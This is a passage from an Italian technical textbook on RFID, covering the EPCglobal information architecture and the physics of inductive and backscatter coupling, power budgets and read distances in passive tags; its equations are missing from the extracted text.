L’architettura informativa (detta anche rete epc) è composta da cinque elementi funzionali.Nel seguito viene illustrata una sintetica descri-zione delle componenti del sistema.- L’Electronic Product Code (descritto in detta-glio nell’apposita appendice), l’identificativocontenuto nei TAG “etichette elettroniche “ eda queste restituito sotto interrogazione, è unnumero (comunemente di 96 bit) che identifi-ca la versione del codice EPC medesimo e gliidentificativi del fabbricante, della classe dioggetti e del singolo oggetto.

- Un “Identification System” composto essen-zialmente dall’insieme di TAG e Reader cheoperano per ottenere gli identificativi.

- Il Middleware o Savant Software;Offre servizi per ridurre il carico ed il trafficoin rete verso i sistemi server a standard PLM inrete “back-end systems”, svolgendo vari com-piti relativi alle informazioni acquisite dai TAGassociati ai prodotti.

Il volume di dati potenzialmente generato da miliardi di TAG EPC,infatti, paralizzerebbe molto velocemente gran parte dei sistemi softwa-re e delle infrastrutture informative aziendali esistenti. La risposta a taleproblema è costituito dal middleware o Savant. I middleware RFIDsono dei software di transito che sono situati in maniera quasi invisibi-le tra i Reader RFID e i server che memorizzano l’informazione deiprodotti. Ciò consente alle aziende di elaborare dati di TAG, relativa-mente poco strutturati, ottenuti da molteplici Reader, indirizzandoliverso opportuni sistemi informativi. Tali software sono in grado di ope-rare differenti tipi di operazioni quali monitorare i dispositivi Reader,gestire false letture, realizzare una cache di dati ed infine interrogarel’Object Naming Service (ONS).

- Object Name Server (ONS);

Figura II.81Infrastruttura informativa EPCGlobal

[EPCGlobal], [4]

2-ParteIInew.qxp:RFID 5-09-2008 10:56 Pagina 139

Page 134: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva140

l’ONS fa corrispondere il codice EPC all’informazione sul prodottoattraverso un processo di interrogazione simile al DNS (Domain NameService) utilizzato in Internet, che è già provato essere una tecnologiain grado di gestire i volumi di dati generati da un sistema EPC RFID.Il server ONS fornisce l’indirizzo IP di un server PML che possiedel’informazione relativa al particolare EPC.

- Physical Markup Language (PML);È un linguaggio basato su XML e fornisce una rappresentazione stan-dardizzata dell’informazione proveniente dalla rete EPC.Infatti mentre l’EPC è in grado di identificare il particolare prodotto,l’informazione realmente utile è descritta mediante il PML che è con-cepito come un formato di documento per lo scambio di dati attraver-so Internet. Il linguaggio PML è utilizzato per descrivere tutte le infor-mazioni rilevanti per un prodotto; per esempio:- Informazioni di locazione del prodotto, ad esempio “il TAG X èstato rilevato dal Reader Y, che è situato presso il molo di carico Z”;

- Informazioni telemetriche (proprietà fisiche di un oggetto, ad esem-pio la sua massa; proprietà fisiche dell’ambiente nel quale un grup-po di oggetti è inserito, ad esempio la temperatura);

- Informazioni di composizione, ad esempio la composizione di unaunità logistica comprendente pallet, scatole, oggetti. Il modelloinformativo comprende anche la possibilità di memorizzare la storiadei differenti elementi elencati in precedenza, ad esempio un insie-me di letture relative a posizioni distinte di un singolo oggetto rap-presenta una traccia del percorso dell’oggetto stesso;-

- Date di produzione e di scadenzaDa quanto esposto appare che l’adozione di un’infrastruttura informa-

tiva, oltre agli innegabili vantaggi, fa emergere anche una nuova esigenzanel processo di standardizzazione. L’attuale normativa infatti (cfr. §VI.1)è polarizzata sull’interoperabilità tra TAG e Reader. Questo dovrebbeassicurare l’intercambiabilità dei TAG in un sistema, ma non può garan-tire quella dei Reader. Per assicurare quest’ultima, infatti andrebbe nor-malizzata l’interfaccia tra il Reader medesimo ed il sistema informativo.

2-ParteIInew.qxp:RFID 5-09-2008 10:56 Pagina 140

Page 135: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFIDFondamenti di una tecnologia silenziosamente pervasiva

PARTE III

ACCOPPIAMENTO, ENERGIAE ANTENNE NEI TAG PASSIVI

Paolo Talone, Giuseppe RussoFondazione Ugo Bordoni

Gaetano Marrocco, Emidio Di GiampaoloDipartimento di Informatica Sistemi e ProduzioneUniversità di Roma “Tor Vergata”

In questa parte vengono illustrati gli aspetti elettromagnetici attinenti ai TAGRFID. Vengono discussi in dettaglio: Principi fisici della comunicazione tra TAG e Reader

- TAG ad accoppiamento induttivo o elettromagnetico. Principi di progettazione delle Antenne Problemi energetici per il funzionamento del TAG passivi

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:56 Pagina 141

Page 136: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI143

ACCOPPIAMENTO INDUTTIVO

L’accoppiamento induttivo tra TAG passivi e Reader avviene tra antennea spire accoppiate (del Reader e del TAG) per rifornire il TAG di energiae trasmettere. Le due antenne sono, dal punto di vista elettrico, un circui-to accordato LC (induttanza - condensatore) e si comportano come untrasformatore elettrico.Si può semplificare il circuito con lo schema della Fig. III.1 in cui sono

indicate la frequenza di risonanza del circuito del TAG e la tensione e cor-rente indotte nel TAG medesimo.

Alla frequenza di risonanza viene massimizzato il trasferimento di ener-gia tra Reader e TAG, si cerca pertanto di rendere questa frequenza ope-rativa del sistema.Osservando la formula della frequenza di risonanza si nota che, a pari-

tà di altri fattori, un numero di spire minore (bassi valori di Lt) genera unafrequenza di risonanza maggiore (ad esempio per la frequenza di 13,56MHz vengono tipicamente usate da 3 a 5 spire nelle antenne).Osservando la formula di corrente e tensione indotte nel TAG si nota

III.1

Figura III.1Frequenza di risonanza nei TAG

ad accoppiamento induttivo

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:56 Pagina 143

Page 137: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva144

come queste siano proporzionali alla frequenza operativa ed al coefficien-te di mutua induttanza tra le antenne a spira del TAG e del Reader.Quest’ultimo, oltre che dalle induttanze delle due antenne, dipende dalfattore k che, come si vedrà nel seguito, dipende fortemente dalla distan-za e dal reciproco orientamento delle due antenne. Una simulazione dellamutua induttanza è illustrata in Figura III.2.

La comunicazione tra Reader e TAG avvienemodulando in ampiezza il campo magneticogenerato dall’antenna del Reader con il segnaledigitale in banda base che deve essere trasmesso.Il circuito di ricezione del TAG riconosce il

campo modulato e decodifica, da questo, l’infor-mazione trasmessa dal Reader.Ora, mentre il Reader ha potenza per modulare

e trasmettere il proprio campo il TAG non ne ha.La comunicazione all’indietro dal TAG al

Reader si realizza quindi tramite accoppiamentoinduttivo, come in un trasformatore in cui l’av-volgimento secondario (antenna del TAG) varia

il proprio carico (“Load Modulation”).Il risultato (modulato) è visto nell’avvolgimento primario (antenna del

Reader). Il chip del TAG realizza questo effetto cambiando l’impedenzadella propria antenna coerentemente con un segnale modulante ricavatodalla lettura dei dati contenuti nella propria memoria.Nella Figura III.3 viene completato il modello di accoppiamento indut-

tivo con il calcolo della tensione nel circuito del Reader, evidenziando ilcontributo prodotto dell’induzione del TAG.In effetti tutto ciò è più complesso in quanto se il segnale di risposta

(modulato) ha la stessa frequenza del segnale di interrogazione delReader, sarà mascherato da questo e non facilmente rilevato a causa deldebole accoppiamento tra Reader e TAG. Il problema verrà trattato neldettaglio in §IV.2.4.

Nella Figura III.4 è illustrato lo schema a blocchi di un TAG passivo

ad accoppiamento induttivo.

Figura III.2Accoppiamento induttivo - Simulazione dellamutua induttanza tra l’antenna di un Readercon spire di 25cm di diametro e l’antenna di

un TAG passivo con spire di 2,5cm [19]

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:56 Pagina 144

Page 138: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI145

Figura III.3Tensione nel circuito del Reader

con evidenziato il contributo per induzionedal TAG

Figura III.4Schema di principio del sistema TAG-Reader

ad accoppiamento induttivo

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:56 Pagina 145

Page 139: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

In sintesi la sequenza di eventi nell’interrogazione del TAG da partedel Reader è la seguente:1. La logica di controllo del Reader invia i dati (dell’interrogazione) al tra-smettitore che genera il segnale per l’antenna a spire.

2. La corrente nell’antenna del Reader induce un campo magnetico pul-sante che si concatena con l’antenna a spire del TAG.

3. La potenza di alimentazione viene estratta da un circuito rettificatore /limitatore.

4. Un circuito di segnalazione abilita il funzionamento dei rimanenti cir-cuiti segnalando la disponibiltà di alimentazione.

5. Il rivelatore/decodificatore fornisce i dati decodificati alla logica dicontrollo (che eventualmente provvederà a scriverli nella memoria).

6. Il rivelatore/decodificatore segnala al modulatore gli istanti in cui èpossibile attivare la trasmissione dei dati verso il Reader.

7. La logica di controllo del TAG legge i dati nella sua memoria e segnalala disponibilità al modulatore che genererà il segnale di pilotaggio negliistanti opportuni (modula l’impedenza d’antenna del TAG medesimo).

8. Il Reader percepisce (tramite il rivelatore) le variazioni d’impedenzadell’antenna del TAG (essendo le spire del TAG e del Reader accop-piate come gli avvolgimenti di un trasformatore) e trasmette i dati rice-vuti alla sua logica di controllo.

ACCOPPIAMENTO ELETTROMAGNETICOL’EFFETTO SCATTERING

Quando un’onda elettromagnetica incide su irregolarità nel mezzo in cuisi propaga, viene dispersa in modo casuale. Questo fenomeno è chiamatoscattering. In sistemi come il radar o gli RFID passivi, un trasmettitoreinvia un’onda elettromagnetica ed un ricevitore rileva lo scattering gene-rato da un oggetto sul quale l’onda incide. Quando il ricevitore è co-loca-to con il trasmettitore il fenomeno è chiamato scatter monostatico o back-scatter (nel seguito, per semplicità il backscatter verrà anche chiamatoriflessione, pur nella relativa improprietà del termine).L’IEEE definisce lo scattering nella propagazione di un’onda radio

RFID - Fondamenti di una tecnologia silenziosamente pervasiva146

III.2III.2.1

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:56 Pagina 146

Page 140: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

come “un processo nel quale l’energia di un’onda viaggiante viene disper-sa rispetto alla direzione di propagazione, a causa dell’interazione con lenon omogeneità del mezzo”. Questo avviene quando un’onda elettroma-gnetica incide su un oggetto ed induce cariche oscillanti e correnti nell’og-getto e sulla sua superficie e, di conseguenza, si genera un nuovo campoelettromagnetico.I TAG RFID modulano il backscatter attraverso la variazione dell’impe-

denza della propria antenna, ciò consente la comunicazione con il Reader.Le antenne dei TAG passivi che sfruttano l’effetto backscatter, sono

pertanto progettate come un compromesso tra le capacità (antitetiche) diassorbire energia, per ricavare potenza per l’alimentazione del TAG, e diriflettere la potenza incidente, modulando il backscatter, per rispondereall’interrogazione.

MODALITÀ OPERATIVA

I TAG passivi che operano in UHF o a frequenze maggiori, usano tecnichea modulazione di ampiezza simili a quelle dei TAG che operano a frequen-za più bassa e ricevono ugualmente la loro potenza dal campo del Reader.La differenza consiste nel modo in cui l’energia è trasferita e nell’antenna.Come si è detto, il trasferimento di energia avviene in regime di

“campo lontano”. In questa regione, nella teoria elettromagnetica, le com-ponenti elettrica e magnetica del campo in un conduttore (antenna) si

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI147

III.2.2

Figura III.5Onda elettromagnetica

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:56 Pagina 147

Page 141: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

irradiano e si propagano nella spazio libero come un’onda combinata(onda elettromagnetica).Si utilizzano quindi antenne a dipolo che catturano il campo EM come

nei tradizionali sistemi di radiocomunicazione.Quando l’onda EM emessa dal Reader incide sull’antenna del TAG una

parte dell’energia è assorbita per fornire potenza al TAG (attraverso unordinario circuito rettificatore da tensione alternata a continua), una parte,invece, è riflessa all’indietro verso il Reader come backscatter.Infatti come quelli ad accoppiamento induttivo, i TAG passivi UHF

non hanno fonti proprie di energia per trasmettere.L’energia ricavata dal campo EM assorbito dall’antenna del TAG è

dell’ordine di 200 microwatt, sicuramente troppo bassa per alimentare untrasmettitore. Per la comunicazione tra TAG e Reader, quindi, si sfrutta lamodulazione dell’effetto backscatter.Anche in questo caso la modulazione del backscatter è ottenuta trami-

te variazione d’impedenza dell’antenna del TAG durante la trasmissionedel segnale da parte del Reader.Il compito del Reader è quello di captare le conseguenti variazioni nel

segnale riflesso.L’uso della tecnica della modulazione del backscatter in campo lonta-

no, introduce problemi differenti da quelli che si manifestano nei sistemia frequenza più bassa.Uno dei maggori problemi è dovuto al fatto che il campo emesso dal

Reader, non è riflesso solo dall’antenna del TAGma anche da tutti gli ogget-ti circostanti con dimensioni paragonabili alla lunghezza d’onda adoperata.Questi campi riflessi (cammini multipli o multipath) si sovrappongono

al campo principale emesso dal Reader e possono provocarne lo smorza-mento o perfino la cancellazione. Inoltre anche in questo caso si potreb-bero verificare problemi derivati dal segnale di risposta (modulato) sullastessa frequenza del segnale di interrogazione del Reader. Il problemaverrà trattato nel dettaglio in §IV.2.4.I TAG passivi a frequenze elevate (UHF, SHF) inoltre, operano a

distanze maggiori di quelli ad accoppiamento induttivo e con antenne piùsemplici, da qui la previsione della larga diffusione di questa tecnologia.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva148

Figura III.6Accoppiamento elettromagnetico -

Simulazione dell’intensità del segnalericevuto a 915 MHz con il trasmettitore

ad 1 m di altezza dal suolo, 2 m di distanzada pareti in un locale di dimensioni

10x14x3 m [19]

Figura III.7Principio di funzionamento dei TAG passivi

[7]

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:56 Pagina 148

Page 142: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Nella Figura III.8 è illustrato lo schema a blocchi di un TAG passivoad accoppiamento elettromagnetico funzionante (in backscattering) nellabanda UHF.In sintesi, la sequenza di eventi nell’interrogazione in Backscatter del

TAG da parte del Reader è la seguente:1. La logica di controllo del Reader invia i dati (dell’interrogazione) al tra-smettitore che genera il segnale RF per l’antenna a dipolo del TAG.

2. Il segnale si propaga nello spazio (campo lontano) e viene ricevuto dal-l’antenna a dipolo del TAG.

3. La potenza di alimentazione viene estratta da un circuito rettificatore /limitatore.

4. Un circuito di segnalazione abilita il funzionamento dei rimanenti cir-cuiti segnalando la disponibiltà di alimentazione.

5. Il rivelatore/decodificatore fornisce i dati decodificati alla logica dicontrollo (che eventualmente provvederà a scriverli nella memoria).

6. Il rivelatore/decodificatore segnala all’oscillatore che pilota il modu-latore gli istanti in cui è possibile attivare la trasmissione dei dativerso il Reader.

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI149

Figura III.8Schema di principio del sistema TAG-Reader

ad accoppiamento elettromagnetico

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 149

Page 143: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

7. La logica di controllo del TAG legge i dati nella sua memoria e segna-la la disponibilità all’oscillatore che genererà il segnale di pilotaggio delmodulatore negli istanti opportuni (modula l’impedenza di antenna delTAG medesimo realizzando il Backscatter).

8. Il Reader riceve il segnale di Backscatter, lo decodifica tramite il ricevi-tore e trasmette i dati ricevuti alla logica di controllo.

POTENZE E DISTANZE OPERATIVE NEI TAG PASSIVI

ACCOPPIAMENTO INDUTTIVO

Quando un TAG ad accoppiamento induttivo transita attraverso il campomagnetico prodotto dal Reader, ai terminali dell'avvolgimento del TAGviene indotta una tensione VTAG in grado di attivare il chip se superiorealla cosiddetta “tensione di soglia” del chip del TAG (qualche Volt). Peravviare il trasferimento dell’informazione e anche necessario che la poten-za elettrica disponibile per il TAG sia sufficiente, naturalmente la poten-za dipende anch’essa da VTAG.I principali fattori che massimizzano il valore di VTAG sono:

– Il campo magnetico prodotto dal Reader che, alle massime potenzepermesse dalla normativa vigente (“Decisione” della CommissioneEuropea 2006/771/CE; ERC/REC 70-03 - Annesso 9 “Inductive appli-cations”; ETSI EN 300 330-classe 1). I valori correnti sono:• 420mA/m (3m)• 126mA/m (10m)

– Il numero di spire nell’antenna del TAG;– L’orientamento reciproco delle antenne del TAG e del Reader (casopeggiore ortogonali, caso migliore parallele).

– Il fattore di merito Q del TAG,ricordando che il fattore di merito di un induttore è inversamente propor-zionale alle perdite di energia per effetto Joule nel rame o per correntiparassite ed isteresi nel ferro (quando l'induttore abbia nucleo ferroma-gnetico), se ne deduce che, con fattori di merito elevati, sarà necessariauna minore quantità di energia per eccitare il circuito risonante del TAG.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva150

III.3

III.3.1

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 150

Page 144: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Nella Figura III.9 viene ancora una volta illustrato lo schema dell’ac-coppiamento induttivo in funzione delle grandezze che concorrono agenerare la tensione indotta nel TAG.In definitiva la tensione indotta VTAG ai capi dell’antenna del TAG,

risulta proporzionale al numero di spire dell’antenna ed alla variazionetemporale del flusso del vettore induzione magnetica BRDR(d) (integraleesteso all’area della spira del TAG del vettore induzione magnetica).Per parte sua il vettore d’induzione magnetica BRDR(d) generato dal

Reader risulta proporzionale a tre gruppi di fattori:– I parametri del Reader (raggio della spira dell’antenna del Reader,numero delle spire, corrente massima che scorre nelle spire, ecc.) chesi possono considerare, nella loro risultante, come una costante, essen-

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI151

Figura III.9Tensione indotta nei TAG induttivi

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 151

Page 145: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

do il valore massimo del campo magnetico in uscita dal Reader mede-simo stabilito dalla normativa (cfr. parte VII).

– I parametri costruttivi del TAG (essenzialmente della sua antenna).– L’inverso del cubo della distanza TAG – Reader (1/d3) e l’angolo tra leantenne, che costituiscono i parametri di maggior interesse.Parimenti la potenza disponibile nel TAG è proporzionale all’inverso

della sesta potenza della distanza TAG – Reader (1/d6), ovvero decrescecon estrema rapidità all’aumentare della distanza.Le distanze operative (di lettura) realizzabili allo stato attuale delle tec-

nologie dei TAG e delle potenze ammesse per i Reader, sono quindimodeste e, per le bande HF, dell’ordine del metro.Tuttavia, rispetto ai TAG elettromagnetici che vengono trattati qui di

seguito e che operano a distanze maggiori, i TAG induttivi vantano unaindiscussa e maggiore immunità ai materiali dielettrici a stretto contattocon il TAG medesimo (metalli e liquidi, compresi i tessuti umani e anima-li); da questo fatto deriva il loro successo.

ACCOPPIAMENTO ELETTROMAGNETICO (UHF ED SHF)

3.2.1 Potenza ricevuta dal TAG

Nei TAG passivi l’energia che alimenta i circuiti è ricavata dal segnaleemesso dal Reader e ricevuto attraverso l’antenna del TAG medesimo.La funzione di estrarre dal segnale ricevuto la componente energetica

per l’alimentazione del TAG è svolta da un circuito di rettificazioneopportunamente accoppiato all’antennaAntenna e circuito rettificatore costituiscono pertanto elementi chiave

per il funzionamento del TAG.Nel caso di TAG passivi ad accoppiamento elettromagnetico funzio-

nanti in bande UHF e SHF, in condizioni quindi di propagazione in“campo lontano”, è piuttosto agevole ricavare la potenza ricevuta dalTAG in funzione di quella emessa dal Reader, dalla distanza tra TAG eReader, dalla lunghezza d’onda di lavoro e dalle caratteristiche dell’appa-rato di ricezione del TAG, [60] [55].

RFID - Fondamenti di una tecnologia silenziosamente pervasiva152

III.3.2

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 152

Page 146: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Con riferimento a Figura III.10, l’analisi della propagazione del campoelettromagnetico, in una prefissata direzione, particolarizzata nell’ipotesidi condizioni di propagazione in spazio libero, consente di ricavare, attra-verso l’applicazione della cosiddetta formula di Friis, la potenza assorbitadal TAG, PTAG_IN:

Nella quale si sono indicati con:– PEIRP, la potenza irradiata dal Reader (PEIRP = PRF G PA GTAG);– GTAG , il guadagno d’antenna del TAG;– d, la distanza tra Reader e TAG;– λRF , la lunghezza d’onda operativa;– τ∈[0:1], il fattore di polarizzazione che tiene conto del disadattamen-to di polarizzazione tra l’antenna ricevente ed il campo incidente;

– Einc, campo elettrico incidente sull’antanna del TAG;– η, Impedenza caratteristica del mezzo di propagazione;– ρT il coefficiente di assorbimento di potenza del TAG espresso da [62]:

il quale risulta dipendente dall’impedenza dell’antenna del TAG,ZA_TAG=RA_TAG+jXA_TAG e dall’impedenza di carico ZL=RL+jXL(vedi Figura III.11) del TAG medesimo. Quest’ultima può variare tra duevalori ZL1 e ZL2, per modulare il backscattering (“load modulation”).È possibile dimostrare, inserendo nella formula di Friis i parametri cir-

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI153

Figura III.10Schema per il calcolo della potenza

ricevuta dal TAG

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 153

Page 147: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

cuitali che rappresentano l’antenna, che:– la massimizzazione della potenza ricevuta si ottiene con antenne dota-te di elevata resistenza di radiazione;

– l’adattamento di impedenza tra l’antenna e il circuito rettificatore mas-simizza il trasferimento di potenza dall’antenna verso il circuito.La resistenza di radiazione di un’antenna trasmittente è un parametro

atto a misurare la capacità dell’antenna di “dissipare” per irradiamento(del campo E.M.) la potenza in ingresso (al netto delle perdite).Inoltre il teorema di reciprocità della teoria della propagazione elettro-

magnetica, consente di stabilire che il comportamento dell’antenna inricezione dipende dagli stessi parametri che ne caratterizzano il compor-tamento in trasmissione.Da un punto di vista formale, per definire la resistenza di radiazione si

considera la schematizzazione di un’antenna per mezzo di un circuitoequivalente costituito da un’impedenza ZA_TAG=RA_TAG+jXA_TAG; laparte reale RA_TAG (resistenza d’ingresso) è divisibile in due contributidetti rispettivamente resistenza di radiazione (Rr) e resistenza di perdita(Rp), ovvero RA_TAG = Rr + RpFornendo all’antenna una potenza d’ingresso Pi risulterà che una parte

di essa Pr sarà irradiata mentre la rimanente parte Pp sarà dissipata dallastruttura fisica dell’antenna.La resistenza di radiazione è pertanto definita sulla base della potenza

irradiata dall’antenna Pr come:Rr = 2 Pr / I2

RFID - Fondamenti di una tecnologia silenziosamente pervasiva154

Figura III.11Schema per il calcolo del coefficiente di

assorbimento di potenza del TAG, ρT

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 154

Page 148: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Analogamente per la resistenza di perdita:

Rp = 2 Pp / I2

È possibile dimostrare che la resistenza di radiazione per il dipolohertziano di lunghezza L, operante alla lunghezza d’onda λRF è fornitadalla seguente espressione:

Similmente si può dimostrare che la resistenza di radiazione per la spiraelementare di raggio a, operante alla lunghezza d’onda λRF è fornita dallaseguente espressione:

Da tale espressione si evince che la resistenza di radiazione della spiraè molto piccola perchè essa dipende dalla quarta potenza della lunghezzadella spira rispetto alla λRF (ad esempio, se 2 a / λRF = 0,2, la resisten-za di radiazione è di circa 0,3 Ω). Se si utilizzano N spire, la resistenza diradiazione aumenta come N2.Le spire elementari sono raramente usate come antenne trasmittenti; il

guadagno infatti è molto basso perché la resistenza ohmica del filo è gene-ralmente molto maggiore della resistenza di radiazione e quindi il rendi-mento è molto basso. In ricezione forniscono prestazioni accettabili solonel caso in cui si disponga di elevati livelli di segnale.Si può concludere che l'antenna a spira ha bassa efficienza per quanto

riguarda la capacità di irradiare (e ricevere) campo elettromagnetico.L’impiego di tali antenne è quindi per la maggior parte limitato a distan-ze e lunghezze d’onda in cui prevale l’effetto di accoppiamento induttivo(campo vicino) piuttosto che di accoppiamento elettromagnetico (campolontano).

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI155

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 155

Page 149: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

3.2.2 Distanza operativa dei TAG passivi elettromagnetici

Prefissando la potenza minima necessaria per l’alimentazione del TAG,PTAG_MIN, è possibile ricavare, dalla formula del paragrafo precedenteche fornisce la potenza assorbita dal TAG, PTAG_IN, la massima distanzaoperativa, d1 del TAG dal Reader in funzione della potenza emessa dalReader medesimo, della lunghezza d’onda, del guadagno dell’antenna delTAG e dei coefficienti ρT e τ [61]:

In questo contesto, la definizione di distanza operativa copre solo unaspetto della comunicazione. La massima distanza operativa ottenutadalla formula di Friis, infatti, è stabilita esclusivamente dal punto di vistadella disponibilità di potenza ricevuta per l’alimentazione del TAG. Si fainfatti riferimento alla sola potenza necessaria per “accendere” fisicamen-te il TAG, PTAG_MIN (potenza minima necessaria per l’alimentazione delTAG), e quindi per consentire al TAG di attivarsi ed attivare il backsca-ter modulando con il contenuto della propria memoria.Non viene tenuto conto che il segnale di Backscatter emesso dal TAG

deve poi raggiungere il Reader ed essere interpretato.La massima distanza di comunicazione, invece, che stabilisce la distan-

za alla quale può operare la coppia Reader TAG, dipende, oltre che dalladistanza operativa del TAG, anche dalla sensibilità del ricevitore delReader (che deve captare il segnale di backscatter del TAG).Viceversa, prefissata una certa distanza operativa tra TAG e Reader, la

formula di Friis consente di ottenere la potenza disponibile per l’alimen-tazione del TAG.Su tale dato, è possibile basare in prima istanza la progettazione dei cir-

cuiti logici del TAG anche se, tenendo conto delle perdite di vario gene-re che causano disadattamento e perdita di efficienza nella conversioneoperata dal circuito rettificatore, i valori forniti dalla formula precedentesi possono, in pratica, ridurre considerevolmente.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva156

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 156

Page 150: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Per valutare la massima distanza di comunicazione si può operare l’a-nalisi che segue.Nell’ipotesi di propagazione in spazio libero si può ottenere l’espres-

sione della potenza re-irradiata per backscattering da parte del TAG:

in cui il coefficiente di backscattering del TAG ρS rappresenta la capa-cità del TAG di operare il backscattering (in termini di frazione di poten-za incidente re-irradiata) e può essere espresso da [60].

Dipendendo quindi dall’impedenza dell’antenna del TAG,ZA_TAG=RA_TAG+jXA_TAG e dall’impedenza di carico ZL=RL+jXL delTAG medesimo che, come si è già ricordato, può variare tra due valoriZL1 e ZL2, per modulare il backscattering (“load modulation”).I coefficienti ρT e ρS rappresentano quindi, in prima approssimazione

rispettivamente:– ρT la capacità del TAG di assorbire energia dal campo elettromagneti-co ricevuto;

– ρS la capacità del TAG di re-irradiare parte della potenza ricevutaopernado il backscattering.Il valore di ρT deve essere opportunamente elevato, al fine di garanti-

re l’attivazione del TAG (adeguata alimentazione del blocco digitale);d’altra parte anche il valore di ρS deve essere elevato affinché la potenzare-irradiata dal TAG sia sufficiente per la corretta ricezione da parte delReader dei dati trasmessi.Sfortunatamente a valori elevati di ρS corrispondono valori modesti di

ρT, e viceversa.Conseguentemente si rende necessario un compromesso; occorre cioè

“progettare il disadattamento” fra antenna del TAG e carico in modo che

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI157

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 157

Page 151: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

i valori ρS e ρT risultino entrambi soddisfacenti (ad esempio: ZA_TAG =ZL*――> ρS= ρT=1).In Figura III.12 sono riportati gli andamenti di ρS e ρT in funzione di

differenti valori dell’impedenza d’antenna del TAG.

Operare con adeguati livelli di potenza rappresenta una condizionenecessaria per il buon funzionamento del sistema; tuttavia è anche neces-sario che ai due “stati di modulazione” (ai due valori ZL1 e ZL2, “loadmodulation”) corrispondano segnali irradiati “il più possibile diversi”(modulazione efficiente), in modo da ridurre la probabilità che in ricezio-ne risultino indistinguibili.Il parametro che quantifica l’efficienza di modulazione è l’indice di

modulazione m (cfr. §IV.2), che nel caso di “load modulation” operata dalTAG può essere espresso in funzione dei parametri del TAG medesimo,come segue:

RFID - Fondamenti di una tecnologia silenziosamente pervasiva158

Figura III.12[61] Coefficienti ρT e ρS al variare di

ZA_TAG=RA_TAG+jXA_TAG

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 158

Page 152: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Se il TAG ed il Reader ricevono segnali di potenza adeguata ma il valo-re di m è troppo basso, i dispositivi si attivano ma può accadere che acausa del rumore/interferenza la demodulazione sia inefficace e che iltasso d’errore BER (Bit Error Rate) della trasmissione digitale sia troppoelevato determinando il non funzionamento del sistema (può essere con-veniente, ad esempio, prevedere un valore di m pari ad almeno 0,6).In particolare, nel caso significativo in cui si abbia:

– ricevitore ideale a filtro adattato,– modulazioni TAG → Reader di tipo ASK / PSK,– codifiche di tipo FM0 / Miller,– rumore AWGN (Additive White Gaussian Noise),si può dimostrare [58] che:

Nella quale la tensione in ingresso al ricevitore del ReaderV0è:

avendo indicato con PRDR_IN_TPM la potenza ricevuta dal Reader nelcaso di “TAG Perfectly Matched”. Nel caso di spazio libero, il valore di PRDR_IN_TPM si può ricavare

dalla formula di Friis:

Una rilevante conseguenza di questa formula è che, in prima approssi-mazione, la potenza ricevuta dal Reader per il Backscatter del TAG èinversamente proporzionale alla quarta potenza della distanza tra TAG eReader. Pertanto per raddoppiare la distanza di comunicazione è necessario mol-

tiplicare per un fattore 16 la potenza di trasmissione del Reader medesimo.

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI159

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 159

Page 153: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Come illustrato in Figura III.13, valori elevati di m (modulazioni effi-cienti) corrispondono a bassi valori di ρT (scarsa alimentazione dellasezione digitale), e viceversa; risulta quindi necessario, anche in tal caso,un compromesso.

